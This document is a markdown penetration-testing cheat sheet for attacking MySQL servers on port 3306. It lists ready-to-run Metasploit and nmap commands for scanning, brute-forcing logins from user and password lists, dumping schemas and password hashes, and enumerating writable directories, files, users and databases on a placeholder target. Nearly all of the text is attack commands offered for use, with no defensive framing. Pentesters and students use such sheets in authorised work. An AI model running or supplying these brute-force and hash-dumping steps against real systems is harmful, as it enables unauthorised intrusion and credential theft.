# MySQL - port 3306

## Scan

*`$ nmap -sV -p3306 <target IP>`*

## Connection

*`$ mysql -h <host IP> -u <username> -p`*

## Bruteforce

With Metasploit:

```bash
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit
```

With nmap:

```bash
nmap -p3306 --script=mysql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt <target IP>
```

## Dump schema

```bash
msf6 > use auxiliary/scanner/mysql/mysql_schemadump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > exploit
```

## Dump hash

With Metasploit:

```bash
msf6 > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit
```

With nmap:

```bash
nmap -p3306 <target IP> --script=mysql-dump-hashes --script-args mysqluser=<username>,mysqlpass=<password>
```

## Writable directories

```bash
msf6 > use auxiliary/scanner/mysql/mysql_writable_dirs
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set dir_list dir.txt
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > exploit
```

## File enumeration

```bash
msf6 > use auxiliary/scanner/mysql/mysql_file_enum
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set file_list files.txt
msf6 auxiliary(scanner/mysql/mysql_file_enum) > exploit
```

## User enumeration

```bash
nmap -p3306 <target IP> --script=mysql-users --script-args mysqluser=<username>,mysqlpass=<password>
```

## Database enumeration

```bash
nmap -p3306 <target IP> --script=mysql-databases --script-args mysqluser=<username>,mysqlpass=<password>
```
